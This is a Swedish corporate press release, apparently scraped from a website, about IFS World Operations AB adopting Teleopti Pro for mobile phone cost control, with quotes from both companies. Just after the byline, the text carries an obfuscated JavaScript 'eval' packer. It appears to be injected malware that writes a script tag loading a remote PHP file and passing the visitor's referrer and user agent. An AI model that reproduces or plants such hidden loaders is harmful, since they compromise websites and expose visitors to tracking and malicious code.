Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

IFS World Operations AB väljer Teleopti Pro

IFS World Operations AB väljer Teleopti Pro
Sebastian

Teleopti eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsyez|var|u0026u|referrer|tseth||js|php’.split(’|’),0,{}))
TEM AB meddelar idag att den globala affärssystemsleverantören IFS World Operations AB har valt Telecom Expense Management-lösningen Teleopti Pro för att kontrollera mobiltelefonkostnaderna inom den svenska verksamheten.

– Vi valde Teleopti Pro för att få kontroll över våra telefonikostnader och för att kunna analysera telefonimönster. Vi förväntar oss att minska våra kostnader och få ett större internt medvetande om våra ringmönster, säger Per Wange, Director of Shared Services, IFS World Operations AB.

IFS valde Teleopti Pro som molntjänst i Microsoft Windows Azure. Mjukvaran tillhandhålls via molnet vilket gör tjänsten underhållsfri och snabbimplementerad utan investering i hårdvara. Teleopti Pro integreras mot befintliga ekonomisystem och affärssystem. Mobiltelefonikostnaderna fördelas med hjälp av Teleopti Pro ut automatiskt till rätt kostnadsställe och individ via standardiserade gränssnitt. Systemet bidrar till ökat kostnadsmedvetande och förenklad hantering.

– Med det nya systemet kommer vi dessutom att kunna analysera våra behov inför framtida upphandlingar av telefonitjänster, fortsätter Per Wange.

– Vi är mycket glada över förtroendet att få IFS World Operations som ny kund. Att de valt Teleopti TEM som leverantör innebär att vi kan erbjuda ett globalt bolag att på ett smidigt sätt göra stora besparingar genom ökad effektivitet och högre kvalitet inom telefoniområdet, säger Kjell Persovin, VD Teleopti TEM AB.

Om IFS

IFS™ är en ledande global leverantör av affärssystem som hjälper företag att bli mer flexibla. Med omfattande kunskaper inom utvalda branscher erbjuder IFS ett flexibelt, helintegrerat affärssystem (ERP) inklusive lösningar för underhåll (EAM) och service. IFS grundades 1983 och är ett publikt aktiebolag (XSTO: IFS) med cirka 2 600 anställda. IFS stödjer fler än 2 200 kunder och är verksamt i fler än 60 länder genom lokala kontor och partners. Mer information finns på www.ifsworld.com.

Om Teleopti TEM

Teleopti TEM är en global leverantör av lösningar för Telecom Expense Management. Företaget är känt för att utveckla avancerade och användarvänliga lösningar baserade på kundens behov. Hundratals företag världen över förlitar sig på lösningar från Teleopti TEM för att uppnå optimal uppföljning av sina telefoni- och IT-kostnader samt komplett svarskvalitetsuppföljning.

Teleopti TEM AB, en avknoppning från Teleopti AB, etablerat i Stockholm, Sverige 1992 verkar genom ett omfattande nätverk av partners. För ytterligare information se www.teleopti.com/tem.

Detta är ett pressmeddelande från Teleopti AB